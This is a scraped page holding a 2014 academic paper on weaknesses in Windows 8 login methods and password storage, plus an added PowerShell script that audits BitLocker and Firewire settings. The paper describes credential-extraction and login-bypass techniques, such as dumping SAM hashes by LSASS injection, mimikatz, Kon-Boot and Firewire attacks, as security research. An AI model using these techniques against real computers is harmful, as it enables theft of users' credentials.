authentication [Delpy 2014c]. According to Mr Delpy, this is valid when the native Windows
support for smart cards is used. Because of the lack of equipment to test the
extraction of PIN codes, this has not been experimented with for this paper.
Not much information about this attack has been released yet, so there isn’t
much publicly available information about how it is done, but it can be assumed that it
works very similarly to the extraction of passwords when PIN and picture password
are used, see Figure 4.
Fig. 4. A smartcard’s PIN code extracted with the use of mimikatz [Delpy 2014c]
5. CONCLUSION
Many of the attacks mentioned in this paper seem like they are from a Hollywood
spy movie, but this is the reality. Microsoft has some strange vulnerabilities in
their login authentication, for which there is no simple explanation of why they
are still there. Both myself and others have tried to get in touch with the Microsoft
security team, to get answers on why these techniques are still possible, but with
no luck. People that are into computer security, as the reader of this
paper probably is, tend to be aware of the risks to their computer, but the average man does
not think of this.
One of the most important security measures for computers and other
computer-like devices is the use of Full Disk Encryption (FDE). This will pre-
vent an adversary from accessing data on the computer’s hard disk, and thereby also
prevent an adversary from bypassing the login to the operating system. From Windows
7, Microsoft included an FDE method called BitLocker, which is very easy to set
up and simple to use. The user of the computer will not notice the existence of
BitLocker, except by a very slight decrease in performance [Hardware 2010]. If
FDE is not an option, for some reason, security measures like for example a BIOS
password or a hard disk password can also be used. A BIOS password does not prevent
an adversary from removing the hard disk from the computer and retrieving either
the password hashes from the SAM file, or the Windows Vault from the vault files.
What it prevents is for example the use of tools like Kon-Boot, or other live
CDs/DVDs/pendrives capable of either resetting passwords or extracting hashes, when
the adversary isn’t able to remove the disk. Hard disk passwords, also known as
ATA passwords, are a category of their own. By some company policies they are considered
just as good as FDE, but this is not disk encryption, it is just using a part of the
ATA standard for hard disks, and in many cases there exists a master password
which overrides the one set by the user [ISEE0XDEADDISKS 2008]. Firewire
attacks bypass all protection of the hard disk if a user has locked a logged-in
system. To mitigate this, the Firewire and/or PCMCIA port must be disabled in
some way, or automatic PCMCIA driver installation should be disabled.
The final conclusion of this paper must be: never leave your computer unattended!
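A defender-side check for two of the mitigations recommended above, FDE and disabling the Firewire path an adversary needs for a DMA attack, written as an added example that is not part of the paper. It assumes a Windows 8/8.1 host with the BitLocker PowerShell module (Get-BitLockerVolume), and it uses the standard Windows driver service names sbp2port and 1394ohci, which are not mentioned in the paper.

```powershell
# Added example (not from the paper): audit the mitigations from the
# conclusion on a Windows 8/8.1 machine. Run from an elevated prompt.
# Assumes the BitLocker module is present. The service names sbp2port
# (SBP-2 over IEEE 1394) and 1394ohci (the OHCI host controller) are
# standard Windows driver services, not values taken from the paper.

function Test-FullDiskEncryption {
    # True only if the OS volume is fully encrypted AND protection is on.
    # A volume can be encrypted while protection is suspended (clear key
    # left on disk), which gives no protection against an offline attacker
    # booting Kon-Boot or reading the SAM / Vault files from the disk.
    $os = Get-BitLockerVolume -MountPoint $env:SystemDrive
    return ($os.VolumeStatus -eq 'FullyEncrypted' -and
            $os.ProtectionStatus -eq 'On')
}

function Test-FirewireDisabled {
    # A driver service with Start = 4 is disabled. Both the SBP-2 protocol
    # driver and the 1394 host controller should be disabled so that a
    # hot-plugged Firewire device cannot get DMA to physical memory while
    # the system is locked with a user logged in.
    $services = 'sbp2port', '1394ohci'
    foreach ($svc in $services) {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$svc"
        if (Test-Path $key) {
            $start = (Get-ItemProperty -Path $key -Name Start).Start
            if ($start -ne 4) { return $false }
        }
        # A missing key means the driver is not installed: nothing to disable.
    }
    return $true
}

function Get-LoginHardeningReport {
    # One object per host, convenient for piping to Export-Csv in a fleet audit.
    [pscustomobject]@{
        Computer          = $env:COMPUTERNAME
        FullDiskEncrypted = Test-FullDiskEncryption
        FirewireDisabled  = Test-FirewireDisabled
    }
}

Get-LoginHardeningReport | Format-List
```

The PCMCIA/ExpressCard path mentioned in the conclusion is not covered by this check, since the paper does not name a specific setting for it.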
REFERENCES
Amazon. 2014. Amazon EC2 pricing. http://aws.amazon.com/ec2/pricing/. Accessed: 21.feb.2014.
Amplia. 2013. Windows credential manager. http://www.ampliasecurity.com/research/windows-credentials-editor/. Accessed: 6.mar.2014.
Aviv, A. J., Gibson, K., Mossop, E., Blaze, M., and Smith, J. M. 2010. Smudge attacks on smartphone touch screens. In Proceedings of the 4th USENIX conference on Offensive technologies. USENIX Association, 1–7.
Bonneau, J., Preibusch, S., and Anderson, R. 2012. A birthday present every eleven wallets? The security of customer-chosen banking PINs. In Financial Cryptography and Data Security. Springer, 25–40.
Burzstein, E. and Picod, J. M. 2010. Recovering Windows secrets and EFS certificates offline. In Proc. of the 4th USENIX Conference on Offensive Technologies. Berkeley, USA: USENIX Association.
DataGenetics. 2012. PIN analysis. http://www.datagenetics.com/blog/september32012/. Accessed: 7.jan.2014.
Delpy, B. 2011. Re – pass the pass. http://blog.gentilkiwi.com/securite/re-pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2012. Re - re – pass the pass. http://blog.gentilkiwi.com/securite/rere-pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2014a. Blog de Gentil Kiwi. http://blog.gentilkiwi.com. Accessed: 21.feb.2014.
Delpy, B. 2014b. mimikatz. http://blog.gentilkiwi.com/mimikatz. Accessed: 17.jan.2014.
Delpy, B. 2014c. mimikatz can now extract *pin code* of smartcards associated with logon sessions. https://twitter.com/gentilkiwi/status/437719635404673025/photo/1. Accessed: 26.feb.2014.
Delpy, B. 2014d. Pass the pass. http://blog.gentilkiwi.com/securite/pass-the-pass. Accessed: 24.feb.2014.
Delpy, B. 2014e. Windows 8, code PIN et mot de passe image. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-code-pin-mot-de-passe-image. Accessed: 23.jan.2014.
Delpy, B. 2014f. Windows 8, empreintes digitales. http://blog.gentilkiwi.com/securite/mimikatz/windows-8-empreintes-digitales. Accessed: 24.jan.2014.
Dieterle, D. W. 2014. Basic Security Testing with Kali Linux, 1 ed. CreateSpace Independent Publishing Platform.
Falde, K. 2013. Restricted admin mode for RDP in Windows 8.1 2012 R2. http://blogs.technet.com/b/kfalde/archive/2013/08/14/restricted-admin-mode-for-rdp-in-windows-8-1-2012-r2.aspx. Accessed: 18.feb.2014.
Freerainbowtables. 2014. Rainbow tables available. https://www.freerainbowtables.com/en/tables2/. Accessed: 26.feb.2014.
Griffin, D. 2007. Create custom login experiences with credential providers for Windows Vista. http://msdn.microsoft.com/en-us/magazine/cc163489.aspx. Accessed: 24.feb.2014.
Hagen, P. N. 2014. Offline NT password and registry editor. http://pogostick.net/~pnh/ntpasswd/. Accessed: 23.feb.2014.
Hardware, T. 2010. System encryption: BitLocker and TrueCrypt compared. http://www.tomshardware.com/reviews/bitlocker-truecrypt-encryption,2587-9.html. Accessed: 24.jan.2014.
ISEE0XDEADDISKS. 2008. List of hard disk ATA master passwords. http://ipv5.wordpress.com/2008/04/14/list-of-hard-disk-ata-master-passwords/. Accessed: 21.feb.2014.
Long, J. and Mitnick, K. 2011. No Tech Hacking: A Guide to Social Engineering, Dumpster Diving, and Shoulder Surfing. Elsevier Science.
Lowe, M. 2013. New ”restricted admin” feature of RDP 8.1 allows pass-the-hash. https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash/. Accessed: 18.feb.2014.
Maartmann-Moe, C. 2011. Inception. http://www.breaknenter.org/projects/inception/. Accessed: 18.feb.2014.
McClure, S., Scambray, J., and Kurtz, G. 2009. Hacking Exposed: Network Security Secrets and Solutions. McGraw-Hill.
Microsoft. 2013. What’s new in biometrics in Windows 8.1. http://technet.microsoft.com/library/dn344916.aspx. Accessed: 24.jan.2014.
Microsoft. 20xx. MSV1_0 authentication package. http://msdn.microsoft.com/en-us/library/windows/desktop/aa378753(v=vs.85).aspx. Accessed: 24.feb.2014.
Mythbusters. 2006. Fingerprint scanners are unbeatable. http://www.discovery.com/tv-shows/mythbusters/mythbusters-database/fingerprint-scanners-unbeatable.htm. Accessed: 18.feb.2014.
Passcape. 2011. LSA secrets in Windows. http://www.passcape.com/index.php?setLang=2&section=blog&cmd=details&id=15. Accessed: 21.feb.2014.
Passcape. 2012a. DPAPI secrets. Security analysis and data recovery in DPAPI (part 1). http://www.passcape.com/index.php?section=blog&cmd=details&id=20. Accessed: 21.feb.2014.
Passcape. 2012b. Security breach in Windows 7 and Windows 8 biometric authentication. http://www.passcape.com/index.php?section=blog&cmd=details&id=31. Accessed: 23.jan.2014.
Passcape. 2012c. Windows 8 stores logon passwords in plain-text. http://www.passcape.com/index.php?section=blog&cmd=details&id=27. Accessed: 7.jan.2014.
Passcape. 2014. Passcape. http://www.passcape.com. Accessed: 21.feb.2014.
Pilkington, M. 2012. Protecting privileged domain accounts: Disabling encrypted passwords. http://digital-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-accounts-disabling-encrypted-passwords. Accessed: 24.feb.2014.
Rapid7. 2011. Microsoft Windows authenticated administration utility. http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec_command. Accessed: 18.feb.2014.
Ronin. 2014. Passing the hash with remote. http://www.kali.org/penetration-testing/passing-hash-remote-desktop/. Accessed: 18.feb.2014.
Skullsecurity. 2011. Passwords. https://wiki.skullsecurity.org/Passwords. Accessed: 21.feb.2014.
Spylogic. 2008. What is digest authentication? http://www.spylogic.net/2008/05/winlockpwn-more-then-a-partytrick/. Accessed: 20.feb.2014.
Superuser. 2012. How to get a screensaver at the Windows 7 login screen? http://superuser.com/questions/107200/how-to-get-a-screensaver-at-the-windows-7-login-screen. Accessed: 26.feb.2014.
thelead82. 2013. Kon-Boot for Windows. http://www.thelead82.com/products-win.html. Accessed: 17.jan.2014.
Wolthusen, S. D. 2014. Lecture slides IMT4541 Foundations in Information Security.
xkcd. 2013. Password strength. https://xkcd.com/936/. Accessed: 24.jan.2014.
ZDNet. 2014. The history of Windows: A timeline. http://www.zdnet.com/the-history-of-windows-a-timeline-7000025145/. Accessed: 18.feb.2014.
Zhao, Z., Ahn, G.-J., Seo, J.-J., and Hu, H. 2013. On the security of picture gesture authentication. In Proceedings of the 22nd USENIX conference on Security. USENIX Association, 383–398.

Más contenido relacionado

Similar a Vulnerabilities in login authentication methods and password storage in Windows 8

Operating system presentation
Operating system  presentationOperating system  presentation
Operating system presentationDescon
 
Windows 8 product guide business english
Windows 8 product guide business englishWindows 8 product guide business english
Windows 8 product guide business englishHeo Gòm
 
POS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayPOS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayBrooke Curtis
 
Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Imam Dermawan
 
BBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxBBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxtarifarmarie
 
E Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenE Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenCrystal Alvarez
 
A Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationA Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationalva christi
 
Operating Systems ( Os )
Operating Systems ( Os )Operating Systems ( Os )
Operating Systems ( Os )Amber Wheeler
 
Windows 8
Windows 8Windows 8
Windows 8liguad1
 
Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Julie Kwhl
 
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...North Star. Inc.
 

Similar a Vulnerabilities in login authentication methods and password storage in Windows 8 (20)

Operating system presentation
Operating system  presentationOperating system  presentation
Operating system presentation
 
Windows 8
Windows 8Windows 8
Windows 8
 
Windows 8
Windows 8Windows 8
Windows 8
 
Windows 8 product guide business english
Windows 8 product guide business englishWindows 8 product guide business english
Windows 8 product guide business english
 
Windows8 vdt
Windows8 vdtWindows8 vdt
Windows8 vdt
 
Ali Saruhan
Ali SaruhanAli Saruhan
Ali Saruhan
 
OlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_FinalOlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_Final
 
POS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayPOS355 Week 5 Individual Essay
POS355 Week 5 Individual Essay
 
About Windows 8
About Windows 8About Windows 8
About Windows 8
 
Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Windows 8 Guide Volume 1
Windows 8 Guide Volume 1
 
Windows 8 Introduction
Windows 8 IntroductionWindows 8 Introduction
Windows 8 Introduction
 
BBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxBBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docx
 
E Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenE Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul Allen
 
Windows 8
Windows 8Windows 8
Windows 8
 
A Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationA Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its application
 
Windows 8 Enterprise
Windows 8 EnterpriseWindows 8 Enterprise
Windows 8 Enterprise
 
Operating Systems ( Os )
Operating Systems ( Os )Operating Systems ( Os )
Operating Systems ( Os )
 
Windows 8
Windows 8Windows 8
Windows 8
 
Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...
 
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
 

Más de John-André Bjørkhaug

ISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordJohn-André Bjørkhaug
 
Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...John-André Bjørkhaug
 
Fighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationFighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationJohn-André Bjørkhaug
 

Más de John-André Bjørkhaug (6)

(IMSI-)Catch me if you can
(IMSI-)Catch me if you can(IMSI-)Catch me if you can
(IMSI-)Catch me if you can
 
ISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passord
 
Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...
 
The Hagelin M-209 cipher machine
The Hagelin M-209 cipher machineThe Hagelin M-209 cipher machine
The Hagelin M-209 cipher machine
 
Generating random primes
Generating random primesGenerating random primes
Generating random primes
 
Fighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationFighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout Randomization
 

Último

activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimizationarrow10202532yuvraj
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Alexander Turgeon
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdfPaige Cruz
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...Daniel Zivkovic
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 

Último (20)

activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 

Vulnerabilities in login authentication methods and password storage in Windows 8

  • 1. Vulnerabilities in login authentication methods and password storage in Windows 8 John-Andre Bjorkhaug Gjovik University College March 2014 Today, with the rise of touchscreen devices, like tablets, smartphones and even laptops with touchscreens, users might find it to cumbersome to type in regular passwords. Typing for example a eight character password containing both regular letters, numbers and even symbols takes too much time and is often not so easy for for the average user, on a touchscreen keyboard. The companies developing these devices have taken the problem under consideration, and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. This paper will focus on the different methods used for logon authentication in the Microsoft Windows 8 and 8.1 operating system, since this now is appearing on more and more touchscreen devices. This paper starts with an introduction, explaining some of the new features of Windows 8. Then there is an introduction to works that are related to this paper. Following is a section about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear-text. Then it is time to dive in to Windows 8, and the new methods for login authentication and their vulnerabilities. The paper ends with a conclusion with some suggestions to techniques that can be used to mitigate some of the vulnerability discussed throughout this paper. Categories and Subject Descriptors: D.4.6 [Security and Protection ]: Invasive software— Operating system security General Terms: security Additional Key Words and Phrases: operating system security, passwords, authentication, PIN 1. INTRODUCTION Today, devices with touchscreens, like smartphones, tablets and laptops, are get- ting more and more usual, and operating systems like Android and iOS have been dominating for some years. 
Using text-based passwords, containing for example both upper and lower cases, numbers and even symbols takes too much time and is often not so easy for for the average user, using touchscreen softkeyboards. The companies developing these devices have taken the problem under consideration, and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. PIN codes and the regular ges- ture password used on different touch devices for years, have a very small password space, compared to a good old text-based password. In Windows 8, Microsoft pre- sented some new native methods for logging in to a Windows system, the use of a a four digit PIN code, the so called picture password, and fingerprint. A four digit PIN code, says itself that it is not very secure, a picture password can be very secure, if implemented correctly. Even though Microsoft Windows have been available in different forms on different touch devices for many years, a lot happened when they
made Windows 8. This version of Windows runs just as well on touch devices as on desktop computers. You have the possibility to use the good old desktop on laptops and desktop computers, and the new tile interface called Modern UI (many still call the interface by its earlier name, Metro), which is better suited for touch devices. Recently there has also been a rise in both laptops and desktop computers with touchscreens.

Microsoft Windows 8 was released in August 2012 and was available to the general public at the end of October the same year. Windows 8.1 came out in October 2013, with small changes compared to 8 [ZDNet 2014]. Actually, 8.1 can in many ways be looked at more as a service pack than as a full OS upgrade. Windows 8 can be said to be one of the biggest changes, at least visually, since Windows 95 replaced Windows 3.11, but Windows 8 is still very Windows 7-like when the new tile interface is not used. Since Windows 8 is relatively new, there are still some teething problems, and both the operating system and its users still need to mature a bit.

In addition to adding Modern UI for use on devices with a touchscreen, Microsoft also included several authentication methods to make the operating system even more user friendly on touch devices. In addition to the good old password, methods like PIN code and picture password have been included from Windows 8. The reason for this is so that the user does not have to type passwords like "Tr0ub4dor" [xkcd 2013] on the device's limited software keyboard, where for example the use of the "shift" key is rather cumbersome. These new login authentication methods have introduced quite a few new vulnerabilities into the login authentication in Windows, in addition to the ones that have been there for years. This paper will discuss both old and new login authentication methods and their vulnerabilities.
All tests performed in this paper have been done on a VMware virtual machine and a Dell Venue 11 Pro tablet, both running Windows 8.

This paper is organized as follows. Section 1 is the introduction you are now reading. Section 2 gives an introduction to works related to this paper. Section 3 is about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear text. Section 4 gives details about the new authentication methods used for logging in to Windows 8 and their vulnerabilities. The paper ends with Section 5, the conclusion, with some suggestions for techniques that can be used to mitigate some of the vulnerabilities discussed throughout this paper.

2. RELATED WORK

Most books covering ethical hacking and penetration testing have a section about extracting and cracking LM and NTLM hashes, for example the "Hacking Exposed" series [McClure et al. 2009]. The "new" authentication forms for Windows, picture passwords and PIN codes, have not yet been written about much in the context of Windows, but the paper "On the Security of Picture Gesture Authentication" by Ziming Zhao et al. [Zhao et al. 2013] describes rather comprehensive research on picture passwords, presenting an empirical analysis of picture gesture authentication based on more than 10,000 picture passwords. This paper focuses more on how the login mechanism works together with the rest of the operating system. When it comes to PIN codes, there has been some statistical research done, among others by
Joseph Bonneau et al. at the University of Cambridge [Bonneau et al. 2012] and the company DataGenetics [DataGenetics 2012]. Also, much of the content in this paper is relatively new and only discussed in the blogs of the smart people who find vulnerabilities and write exploits, like for example the blog of the Russian company Passcape [Passcape 2014] and that of the French security researcher Benjamin Delpy aka "gentilkiwi" [Delpy 2014a].

3. CLASSICAL LOGIN AUTHENTICATION VULNERABILITIES IN WINDOWS

Before going into the vulnerabilities that are new to Windows 8 because of the new login authentication methods, the good old vulnerabilities in the login mechanism and password storage, which are still valid for Windows 8.x, will be discussed.

Fig. 1. Password login screen in Windows 8.1, with the choice of login method below the input field.

3.1 Password hashing

In Microsoft Windows, a cryptographic hash of the password is stored in a file called "SAM" (Security Accounts Manager), located at %systemroot%\system32\config\SAM. This file is a part of the registry, in an officially undocumented binary format [Hagen 2014]. In the Windows registry the SAM is mounted under the key HKEY_LOCAL_MACHINE\SAM. Both of these locations are locked even for the administrator while the operating system is running, but it is possible to extract the hashes from the registry on a running system with the help of DLL injection into the LSASS (Local Security Authority Subsystem Service) process, with tools like pwdump, fgdump, Cain & Abel and mimikatz, which we will discuss more later. Other places to extract hashes from include a shadow copy of the SAM file. Readers interested in knowing more about what can be found in the LSASS process are recommended to read [Passcape 2011].
